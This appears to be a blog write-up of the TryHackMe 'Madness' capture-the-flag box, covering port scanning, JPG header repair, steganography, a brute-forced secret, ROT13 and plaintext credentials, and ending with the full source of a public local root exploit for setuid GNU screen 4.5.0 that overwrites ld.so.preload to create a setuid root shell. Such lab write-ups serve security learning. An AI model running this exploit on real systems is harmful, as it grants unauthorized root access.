THM - Madness | An ordinary day

Introduction

Will you be consumed by Madness?

This is a easy rated box. Let’s begin.

Ports

nmap says we’ve got 22 (SSH) and 80 (HTTP) only.

Webserver

To start with, this appears to be simply the Apache default page. But hidden away is a comment:

<img src="thm.jpg" class="floating_element"/>
<!-- They will never find me-->

We can grab the file with wget:

kali:/opt/tryhackme/madness# wget http://madness.thm/thm.jpg

The file is corrupted, but we can repair it with hexeditor by replacing the first 12 bytes with FF D8 FF E0 00 10 4A 46 49 46 00 01 to reveal a hidden directory:

http://madness.thm/th1s_1s_h1dd3n/

Secret

The page says:

Welcome! I have been expecting you! To obtain my identity you need to guess my secret!

So now we can do: http://madness.thm/th1s_1s_h1dd3n/?secret=0

And the source code reveals the ‘secret’ value is between 0 and 99. With Burp Turbo Intruder we can establish that it is 73, and we get the message:

Urgh, you got it right! But I won’t tell you who I am! y2RPJ4QaPF!B

This string is the used as a passphrase for the repaired JPG from earlier to extract some hidden text:

Fine you found the password!
Here’s a username
wbxre
I didn’t say I would make it easy for you!

This is ROT13 encoding for the word joker.

However, we can’t SSH in as joker with y2RPJ4QaPF!B as the password, because the password is something else.

So, what is it?

Yep, I had to check a writeup. You go to the room page on the THM website, download a picture from there and run steghide with no password to get the hidden file; the password is *axA&GF8dP.

Can I just say, that’s some real bullshit. You might have a different view and that’s fine, but I wasn’t impressed.

Root

Run linpeas, find out ‘screen’ is a PE vector. Quick google, find an exploit, run it, root. F*** this box.

Exploit

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017) 
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
/bin/screen-4.5.0 -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
/bin/screen-4.5.0 -ls # screen itself is setuid, so... 
/tmp/rootshell